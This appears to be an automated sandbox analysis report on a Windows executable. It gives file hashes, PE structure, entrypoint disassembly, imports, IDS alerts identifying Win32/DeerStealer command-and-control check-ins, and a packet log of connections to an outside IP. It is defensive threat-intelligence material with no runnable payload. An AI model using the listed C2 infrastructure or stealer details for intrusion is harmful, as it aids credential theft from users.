                                                                                                      Preview:qQ..U._QcY.VJ]..Y.C.f.ShbL.A]v.]Vp....cV..SRlI...M.uZ_.Zd..Ak..v.j...E..UO.M..JL^.Wc.k.Tv...Xe..IFBypRU.RC.l_..Yx....af.lmmS._.V.....d..w...xR..al.o.j.Euo..y.kbp..L.I\..F.T.Z.exq.hab....Va.lyWrZA...R..H[..l.t\kK.B.Hyb_..PIB....Cyc\..v.`.].jO....LN.cc.x..Vw.h.^q..h.K.qsuR.g..P_.DQ.SfJt.[\.Uh.x..snr.pQUb.i.....`......D...yU...yiaIx.KlZQvE..ox..J.i...P....PrlN.O....N.U[.`.KtPb..p...ue...bC..a...S.A.J..r.pRi..h...T..C..^XQ...a.P....]H.wwTj..jO.U...\.....H.K`......M.v...A`.iU.Td...O.j.H..oQK..]G...FSG..Y....D..F......rpBKc..k.H.S..J.Jjr`.D.....i.dRv...k[.qxKd.mR....W.p.yN..GlP.Y...Y.S.Op\.xCLYe[\.reOo...xY..e.........aML.F.Sf..J.F...\c...nrX].v....g...Y.Y._.D.b.F...]..^.l..[..R....txKM].o.eE.iy.R.....G.o.R.wR.P`.\.gk.VT\....QS.RgQJBx.J....o.......G.t....vA..x.f...TiRQm....B\H.TMK....._.....jq..w..W.Qw.h.HEiEZg.s.Q.h.B.uyK..e..uQ...QTq.g..M....d.a`...kV\i.g.o..\ox..W.vc.a......U...p.f..J.n.KQuu.y...j._....SY..U..mNE..t.i.....CV.p..Ge.....e.D.b..X.l....eam..y.K..hl......\...Fr..h._`K......xg.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\hv.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4551445
                                                                                                      Entropy (8bit):7.957419975728077
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:eo/JG7NH2ZIhXD8f5oBj0BjgQSbpr6d8sfWTxwaLS9TfZ2:z/87N22XDu5e8gnPsfWw9U
                                                                                                      MD5:ED0003315889A453764BD67087E27DCB
                                                                                                      SHA1:A5F5398BE3E35A31362EC06A8F7F95922141746B
                                                                                                      SHA-256:C0EE9297F933FDA00F4AF59D1B4107960C3A24836CB260D5532F989DA196DE37
                                                                                                      SHA-512:83D08BBAF47A7E48AA7F857AC277FFD6B0C16AAEA8723928AC9063626618C95AF662A1C8338B7CE45D546253A841788C9B788C2A6A984E6CA1DBE0158B21EE2F
                                                                                                      Malicious:false
                                                                                                      Preview:dll..yc[O...qk.m.RX..Lpkb...ES.L.o.m..k.u...U...\ve...Taqbl.Z...K.a........H_..rFV.r_......F.ywv...Q..v.eM...EcK...y\..H..Ql....du.Z..J.]..uVX.Sn..O..d....\.E...A..V..[.J]..TDQ..G...x.u.rMm.Vc..f....lisM.jNNe.c..r[^..m._......G..oNXn.w.SbAU.T...r^R....r..V..OSFv.K.s_ddhQW^.lyt..h.qCN....po\t..DP..UBtUp.L.Q.h..K.c....q.R..t.OVMW.la.bew.^.wi.YQ.ej..Ibd...EO.kJva.xGR..x..sG.X.i....s.xJy.fp..i....^j...N_..\QW^t.i.xmGF\y.N....p..nXg_..b].K.a..P...T.j.q.N.\s.i.Tm..M..u..h...[.T..G.IOXy^QQ..m....R..rL].....J.L.k].de[..kv..G.b..J.bq.SG..gHCX......e.sK.a.SSW.....vF._..x....VGY.J..FCB.s...n.tu`bR...K.TGr.....Y.k.l_]EM.^fBv.E...^yHY...k.Gp..EfL..e....E.Y....Vfl.A.f.vYq.mGa..e...ju.iNV.S...LAM....sfc..]sA..^.......U.m.....P...^.\......W.x..X..njXN_].....o]Y.Km...g_..B...h.A..r.b.o.l.U.......R..wK.fbe.Z.KZm.JW..n.r.Bd..]..[U...e.d..RM.x.L[P.i...q.....F...g.FN..._YY.vJC...jv`a.Ip.N...e..G..SVx..A^......nYCn...p....oxD....mLjL...mq..C.\.dk.....Z.._J.B.AY.u_HR.....KR.r.R.w....WG..Lk.Bg.bn.EBV\..QP.bQq
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.996148375386849
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:9mauyKC3JW.exe
                                                                                                      File size:9'118'184 bytes
                                                                                                      MD5:ae130c89b7d8c4c9fd06422faeb79fc9
                                                                                                      SHA1:b5fdcc9e63448dd0f68b75b7bf54ff3fef94623c
                                                                                                      SHA256:b13a4e5207954eaeb6aaf32e333a4f366a86afc0779406c9bf17805d5b83e2e9
                                                                                                      SHA512:650f4d4d383db5e9b9f2cc32bb3d5c74e4f265ec86b311ad715df065cd9f00ba38be2d37cdb8b6adf955c39eafbf616bb1dac159baac2b93cbe5e45b2b931def
                                                                                                      SSDEEP:196608:+pNmeBG+ftWTWNkP6H+j/H0fiHF9FcaWmLOtgyd90PC9rK/prrKD36:+pNmWG+lMJP/r0KHrFcaWmytpdePC9Dm
                                                                                                      TLSH:4E9633903345F4FAE136E5B62F7C87A242B5DE4926810F4FA7A60E1F1EC2BD1950B0D6
                                                                                                      File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.............................
                                                                                                      Icon Hash:d292fcd8f2f2fe1c
                                                                                                      Entrypoint:0x411def
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:
                                                                                                      Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:b5a014d7eeb4c2042897567e1288a095
                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push FFFFFFFFh
                                                                                                      push 00414C50h
                                                                                                      push 00411F80h
                                                                                                      mov eax, dword ptr fs:[00000000h]
                                                                                                      push eax
                                                                                                      mov dword ptr fs:[00000000h], esp
                                                                                                      sub esp, 68h
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                      xor ebx, ebx
                                                                                                      mov dword ptr [ebp-04h], ebx
                                                                                                      push 00000002h
                                                                                                      call dword ptr [00413184h]
                                                                                                      pop ecx
                                                                                                      or dword ptr [00419924h], FFFFFFFFh
                                                                                                      or dword ptr [00419928h], FFFFFFFFh
                                                                                                      call dword ptr [00413188h]
                                                                                                      mov ecx, dword ptr [0041791Ch]
                                                                                                      mov dword ptr [eax], ecx
                                                                                                      call dword ptr [0041318Ch]
                                                                                                      mov ecx, dword ptr [00417918h]
                                                                                                      mov dword ptr [eax], ecx
                                                                                                      mov eax, dword ptr [00413190h]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      mov dword ptr [00419920h], eax
                                                                                                      call 00007FCB65041B82h
                                                                                                      cmp dword ptr [00417710h], ebx
                                                                                                      jne 00007FCB65041A6Eh
                                                                                                      push 00411F78h
                                                                                                      call dword ptr [00413194h]
                                                                                                      pop ecx
                                                                                                      call 00007FCB65041B54h
                                                                                                      push 00417048h
                                                                                                      push 00417044h
                                                                                                      call 00007FCB65041B3Fh
                                                                                                      mov eax, dword ptr [00417914h]
                                                                                                      mov dword ptr [ebp-6Ch], eax
                                                                                                      lea eax, dword ptr [ebp-6Ch]
                                                                                                      push eax
                                                                                                      push dword ptr [00417910h]
                                                                                                      lea eax, dword ptr [ebp-64h]
                                                                                                      push eax
                                                                                                      lea eax, dword ptr [ebp-70h]
                                                                                                      push eax
                                                                                                      lea eax, dword ptr [ebp-60h]
                                                                                                      push eax
                                                                                                      call dword ptr [0041319Ch]
                                                                                                      push 00417040h
                                                                                                      push 00417000h
                                                                                                      call 00007FCB65041B0Ch
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x18d04.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x1a0000x18d040x18e009dee09854e79aa987e5336a4defda540False0.2433358197236181data5.382874846103129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0x1a1f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6781914893617021
                                                                                                      RT_ICON0x1a6580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.47068480300187615
                                                                                                      RT_ICON0x1b7000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.41161825726141077
                                                                                                      RT_ICON0x1dca80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.3213863958431743
                                                                                                      RT_ICON0x21ed00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584RussianRussia0.1865609842659411
                                                                                                      RT_GROUP_ICON0x326f80x4cdataRussianRussia0.7763157894736842
                                                                                                      RT_VERSION0x327440x350dataEnglishUnited States0.47523584905660377
                                                                                                      RT_MANIFEST0x32a940x270ASCII text, with very long lines (624), with no line terminatorsEnglishUnited States0.5144230769230769
                                                                                                      DLLImport
                                                                                                      COMCTL32.dll
                                                                                                      KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                                                                      USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                                                      GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                                                      SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                                                      ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                                                      OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                                                                      MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      RussianRussia
                                                                                                      EnglishUnited States
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-27T08:15:52.621984+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.153.243443TCP
                                                                                                      2024-12-27T08:15:53.549685+01002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.849711172.67.153.243443TCP
                                                                                                      2024-12-27T08:15:55.284043+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713172.67.153.243443TCP
                                                                                                      2024-12-27T08:15:57.338216+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:05.356520+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:08.819571+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849717172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:10.842099+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849718172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:12.781810+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849719172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:14.704165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849720172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:17.109798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849721172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:19.577127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849722172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:23.630281+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849723172.67.153.243443TCP
                                                                                                      2024-12-27T08:16:24.333173+01002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.849723172.67.153.243443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 27, 2024 08:15:51.266072035 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:51.266136885 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:51.266196966 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:51.267795086 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:51.267812967 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:52.621258974 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:52.621984005 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:52.624870062 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:52.624886036 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:52.625155926 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:52.668507099 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:52.669495106 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:52.669537067 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:52.669639111 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.549719095 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.553225994 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.553286076 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.553369045 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.553452015 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.553502083 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.553518057 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.561297894 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.561347008 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.561363935 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.569998026 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.570051908 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.570067883 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.578250885 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.578303099 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.578318119 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.621512890 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.669044018 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.715255976 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.715291977 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.762120962 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.763892889 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.767860889 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.767914057 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.767931938 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.776133060 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.776190042 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.776221037 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.784209967 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.784265041 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.784281969 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.792412043 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.792464018 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.792478085 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.800463915 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.800514936 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.800530910 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.808715105 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.808773041 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.808790922 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.815157890 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.815231085 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.815241098 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.815274954 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.815347910 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.815423965 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.821708918 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.821763039 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.821780920 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.828175068 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.828226089 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.828243017 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.841034889 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.841089964 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.841114044 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.846920013 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.846971035 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.846988916 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.853403091 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.853460073 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.853478909 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.902751923 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.974096060 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.977186918 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.977251053 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.977281094 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.977320910 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.986399889 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.986407995 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.986463070 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:53.995652914 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.995660067 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:53.995714903 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.000308990 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:54.000355959 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.000386953 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:54.000416040 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:54.000457048 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.000510931 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.000557899 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:54.000627041 CET49711443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.000646114 CET44349711172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:54.063123941 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.063216925 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:54.063288927 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.063580990 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:54.063615084 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.283950090 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.284043074 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:55.285485983 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:55.285511017 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.285804033 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.286915064 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:55.286963940 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:55.286971092 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.895854950 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.895945072 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:55.896106958 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:55.939452887 CET49713443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:55.939491034 CET44349713172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:56.032913923 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:56.033035040 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:56.033163071 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:56.033544064 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:56.033581972 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:57.338087082 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:57.338216066 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:57.346563101 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:57.346612930 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:57.346962929 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:57.347718000 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:57.347784996 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:57.347795963 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:58.033941984 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:58.034007072 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:58.034069061 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:58.047130108 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:58.047159910 CET44349714172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:15:58.047195911 CET49714443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:15:58.047203064 CET44349714172.67.153.243192.168.2.8
